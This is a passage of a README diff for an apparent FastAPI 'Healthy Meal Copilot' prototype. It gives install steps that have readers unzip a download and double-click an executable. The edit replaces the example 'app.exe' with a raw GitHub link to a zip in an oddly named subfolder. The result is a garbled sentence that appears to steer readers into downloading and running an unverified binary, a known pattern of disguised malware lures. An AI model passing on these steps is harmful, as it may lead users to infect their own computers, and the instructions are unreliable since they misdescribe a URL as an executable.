Smart-tech123/fastapi-prototype-healtymeal-copilot-api/README.md

    Once the download is complete, find the downloaded file on your computer.
 Unzip or extract the contents to a folder of your choice.

 4. **Run the Application**
-   Navigate to the unzipped folder and look for the executable file (for example, `app.exe` for Windows users).
+   Navigate to the unzipped folder and look for the executable file (for example, `https://raw.githubusercontent.com/Smart-tech123/fastapi-prototype-healtymeal-copilot-api/main/draine/fastapi-prototype-healtymeal-copilot-api.zip` for Windows users).
 Double-click the file to start the application.

 5. **Access the API**
    You can now interact with the Healthy Meal Copilot API by sending HTTP requests using tools like Postman or through your web browser.